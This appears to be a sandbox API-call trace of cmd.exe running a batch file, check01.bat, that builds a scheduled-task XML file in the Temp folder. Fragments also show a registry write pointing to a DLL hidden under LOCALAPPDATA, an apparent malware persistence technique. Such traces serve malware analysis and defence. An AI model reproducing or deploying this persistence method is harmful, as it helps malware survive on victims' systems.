[0377.914] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0377.914] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.914] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0377.914] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.914] GetFileType (hFile=0x64) returned 0x1
[0377.914] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x143
[0377.914] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x142
[0377.915] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0377.915] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.915] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21cc60, Size=0x4c) returned 0x21cc60
[0377.915] GetProcessHeap () returned 0x200000
[0377.915] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21cc60) returned 0x4c
[0377.915] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer="kEecfMwgj \r\n") returned 29
[0377.915] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.916] GetFileType (hFile=0x64) returned 0x1
[0377.916] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.916] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="kEecfMwgj \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kEecfMwgj \r\n", lpUsedDefaultChar=0x0) returned 30
[0377.916] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x1d, lpOverlapped=0x0) returned 1
[0377.916] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0377.919] _close (_FileHandle=3) returned 0
[0377.920] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.920] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.922] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.923] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.924] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.924] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.925] SetConsoleInputExeNameW () returned 0x1
[0377.925] GetConsoleOutputCP () returned 0x1b5
[0377.926] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.926] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.927] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.928] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.928] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.928] SetFilePointer (in: hFile=0x64, lDistanceToMove=1000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3e8
[0377.928] GetProcessHeap () returned 0x200000
[0377.928] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0377.929] GetProcessHeap () returned 0x200000
[0377.929] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc60 | out: hHeap=0x200000) returned 1
[0377.929] GetProcessHeap () returned 0x200000
[0377.929] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0377.929] GetProcessHeap () returned 0x200000
[0377.929] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0377.929] GetProcessHeap () returned 0x200000
[0377.930] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0377.930] GetProcessHeap () returned 0x200000
[0377.930] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x219a30 | out: hHeap=0x200000) returned 1
[0377.930] GetProcessHeap () returned 0x200000
[0377.930] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.930] GetProcessHeap () returned 0x200000
[0377.930] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0377.930] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.930] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3e8
[0377.931] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xb4a, lpOverlapped=0x0) returned 1
[0377.931] SetFilePointer (in: hFile=0x64, lDistanceToMove=1041, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x411
[0377.931] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml \r\n", cbMultiByte=41, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml \r\ntemp%\\a.xml\r\nl\r\ntemp%\\a.xml\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 41
[0377.931] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.931] GetFileType (hFile=0x64) returned 0x1
[0377.931] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.931] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x411
[0377.931] GetProcessHeap () returned 0x200000
[0377.932] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2313d0
[0377.932] GetProcessHeap () returned 0x200000
[0377.932] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2353f0
[0377.932] GetProcessHeap () returned 0x200000
[0377.932] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0377.932] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0377.932] GetProcessHeap () returned 0x200000
[0377.932] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.932] GetProcessHeap () returned 0x200000
[0377.933] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2353f0 | out: hHeap=0x200000) returned 1
[0377.933] GetProcessHeap () returned 0x200000
[0377.933] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2313d0 | out: hHeap=0x200000) returned 1
[0377.933] _tell (_FileHandle=3) returned 1041
[0377.934] _close (_FileHandle=3) returned 0
[0377.934] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0377.934] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0377.934] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0377.934] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0377.934] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0377.934] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0377.934] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0377.934] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0377.934] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0377.934] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0377.935] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.935] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.935] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.935] GetFileType (hFile=0x7) returned 0x2
[0377.935] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0377.936] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0377.936] _dup (_FileHandle=1) returned 3
[0377.937] _close (_FileHandle=1) returned 0
[0377.938] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0377.938] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.938] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0377.939] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.939] GetFileType (hFile=0x64) returned 0x1
[0377.939] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x160
[0377.939] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x15f
[0377.939] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0377.939] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.940] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21cc60, Size=0x36) returned 0x21cc60
[0377.940] GetProcessHeap () returned 0x200000
[0377.940] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21cc60) returned 0x36
[0377.940] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 19
[0377.940] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.940] GetFileType (hFile=0x64) returned 0x1
[0377.940] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.940] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 20
[0377.940] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x13, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x13, lpOverlapped=0x0) returned 1
[0377.941] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0377.942] _close (_FileHandle=3) returned 0
[0377.943] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.943] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.944] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.944] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.945] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.945] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.945] SetConsoleInputExeNameW () returned 0x1
[0377.945] GetConsoleOutputCP () returned 0x1b5
[0377.946] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.946] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.946] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.946] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.947] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.947] SetFilePointer (in: hFile=0x64, lDistanceToMove=1041, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x411
[0377.947] GetProcessHeap () returned 0x200000
[0377.947] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x228690 | out: hHeap=0x200000) returned 1
[0377.947] GetProcessHeap () returned 0x200000
[0377.947] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc60 | out: hHeap=0x200000) returned 1
[0377.948] GetProcessHeap () returned 0x200000
[0377.948] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0377.948] GetProcessHeap () returned 0x200000
[0377.948] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216db0 | out: hHeap=0x200000) returned 1
[0377.948] GetProcessHeap () returned 0x200000
[0377.948] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0377.948] GetProcessHeap () returned 0x200000
[0377.948] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d70 | out: hHeap=0x200000) returned 1
[0377.948] GetProcessHeap () returned 0x200000
[0377.948] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0377.948] GetProcessHeap () returned 0x200000
[0377.948] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.948] GetProcessHeap () returned 0x200000
[0377.948] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0377.949] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.949] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x411
[0377.949] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xb21, lpOverlapped=0x0) returned 1
[0377.949] SetFilePointer (in: hFile=0x64, lDistanceToMove=1090, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x442
[0377.949] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml \r\n", cbMultiByte=49, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml \r\nxml\r\nl\r\ntemp%\\a.xml\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 49
[0377.949] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.949] GetFileType (hFile=0x64) returned 0x1
[0377.950] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.950] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x442
[0377.950] GetProcessHeap () returned 0x200000
[0377.950] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2313d0
[0377.950] GetProcessHeap () returned 0x200000
[0377.950] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2353f0
[0377.950] GetProcessHeap () returned 0x200000
[0377.950] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0377.950] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0377.950] GetProcessHeap () returned 0x200000
[0377.950] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.951] GetProcessHeap () returned 0x200000
[0377.951] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2353f0 | out: hHeap=0x200000) returned 1
[0377.951] GetProcessHeap () returned 0x200000
[0377.952] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2313d0 | out: hHeap=0x200000) returned 1
[0377.952] _tell (_FileHandle=3) returned 1090
[0377.952] _close (_FileHandle=3) returned 0
[0377.953] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0377.953] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0377.953] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0377.953] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0377.953] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0377.953] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0377.953] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0377.953] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0377.953] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0377.953] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0377.953] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.954] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.954] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.954] GetFileType (hFile=0x7) returned 0x2
[0377.954] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0377.954] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0377.955] _dup (_FileHandle=1) returned 3
[0377.956] _close (_FileHandle=1) returned 0
[0377.957] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0377.957] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.957] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0377.957] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.957] GetFileType (hFile=0x64) returned 0x1
[0377.957] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x173
[0377.958] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x172
[0377.958] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0377.958] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.958] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x231400, Size=0x44) returned 0x228730
[0377.959] GetProcessHeap () returned 0x200000
[0377.959] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x228730) returned 0x44
[0377.959] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 27
[0377.959] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.959] GetFileType (hFile=0x64) returned 0x1
[0377.959] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.959] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 28
[0377.959] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x1b, lpOverlapped=0x0) returned 1
[0377.959] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0377.961] _close (_FileHandle=3) returned 0
[0377.962] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.962] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.963] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.963] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.963] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.963] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.964] SetConsoleInputExeNameW () returned 0x1
[0377.964] GetConsoleOutputCP () returned 0x1b5
[0377.964] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.964] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.965] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.965] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.965] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.965] SetFilePointer (in: hFile=0x64, lDistanceToMove=1090, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x442
[0377.965] GetProcessHeap () returned 0x200000
[0377.965] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x219a30 | out: hHeap=0x200000) returned 1
[0377.965] GetProcessHeap () returned 0x200000
[0377.966] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x228730 | out: hHeap=0x200000) returned 1
[0377.966] GetProcessHeap () returned 0x200000
[0377.966] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0377.966] GetProcessHeap () returned 0x200000
[0377.966] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2286e0 | out: hHeap=0x200000) returned 1
[0377.966] GetProcessHeap () returned 0x200000
[0377.966] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0377.966] GetProcessHeap () returned 0x200000
[0377.966] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0377.966] GetProcessHeap () returned 0x200000
[0377.966] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x228690 | out: hHeap=0x200000) returned 1
[0377.967] GetProcessHeap () returned 0x200000
[0377.967] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.967] GetProcessHeap () returned 0x200000
[0377.967] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0377.967] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.967] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x442
[0377.967] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xaf0, lpOverlapped=0x0) returned 1
[0377.968] SetFilePointer (in: hFile=0x64, lDistanceToMove=1143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x477
[0377.968] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml \r\n", cbMultiByte=53, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml \r\n\nl\r\ntemp%\\a.xml\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 53
[0377.968] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.968] GetFileType (hFile=0x64) returned 0x1
[0377.968] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.968] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x477
[0377.968] GetProcessHeap () returned 0x200000
[0377.968] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0377.969] GetProcessHeap () returned 0x200000
[0377.969] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0377.969] GetProcessHeap () returned 0x200000
[0377.969] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0377.969] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0377.969] GetProcessHeap () returned 0x200000
[0377.969] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.969] GetProcessHeap () returned 0x200000
[0377.970] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0377.970] GetProcessHeap () returned 0x200000
[0377.971] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0377.971] _tell (_FileHandle=3) returned 1143
[0377.971] _close (_FileHandle=3) returned 0
[0377.972] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0377.972] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0377.972] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0377.972] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0377.972] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0377.972] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0377.972] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0377.972] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0377.972] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0377.972] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0377.972] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.972] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.973] _get_osfhandle (_FileHandle=1) returned 0x7
